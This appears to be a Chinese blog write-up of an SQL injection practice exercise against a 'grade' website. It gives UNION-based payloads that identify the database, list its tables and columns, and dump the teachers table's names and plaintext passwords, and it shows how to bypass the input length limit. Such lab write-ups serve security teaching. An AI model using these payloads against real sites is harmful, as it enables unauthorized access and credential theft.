sql注入练习

对grade网站进行漏洞探测,爆出任意表的账号密码。

基本信息:
网站截图
在这里插入图片描述

1.对grade网站进行漏洞探测,爆出任意表的账号密码。
在查询学号处
1) 猜测的用户admin,查询学号成功
在这里插入图片描述

2)输入 admin and 1=1,发现能够正确执行没有报错,但没有查出学号,说明可能是字符型注入

admin and 1=1

在这里插入图片描述

3)输入admin’ and 1=1 – - ,执行成功,且查出学号,确定是字符型注入

admin' and 1=1 -- -

在这里插入图片描述

4)order by 判断显示字段数
admin’ order by 1 – - 正常显示;
admin' order by 1 -- -在这里插入图片描述

admin’ order by 2 – -异常,故只有一个字段显示,可构造union slect 1

admin' order by 2 -- - 在这里插入图片描述

5)爆库:admin’ union select database() – -,数据库grade
admin' union select database() -- -在这里插入图片描述

6)爆表:admin’ union select group_concat(table_name) from information_schema.tables where table_schema =‘grade’ – -

admin' union select group_concat(table_name) from information_schema.tables where table_schema ='grade' -- -

在这里插入图片描述

查询结果:
admins,classes,english,networks,students,teachers

注:在输入sql注入语句时,发现输入数据长度被限制,出现以下错误:
在这里插入图片描述

可以在输入栏右键 -->检查 –> 在中maxlength="50"删去,就可以输入更多数据了
在这里插入图片描述

7)爆字段(teachers表):
admin’ union select group_concat(column_name) from information_schema.columns where table_schema =‘grade’ and table_name = ‘teachers’ – -

admin' union select group_concat(column_name) from information_schema.columns where table_schema ='grade' and table_name = 'teachers' -- -

在这里插入图片描述

查询结果:
id,name,pass

8)爆数据:
admin’ union select group_concat(id,0x23,name,0x23,pass) from teachers – -

admin' union select group_concat(id,0x23,name,0x23,pass) from teachers 

在这里插入图片描述

查询结果:
2001#fengwanzhong#feng001,2002#yunankun#yu002
0x23表示#
这里用#分隔字段,逗号分隔行;

这里只是对该网站比较简单是sql注入,还有其他的注入点和注入方式不作过多讨论。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值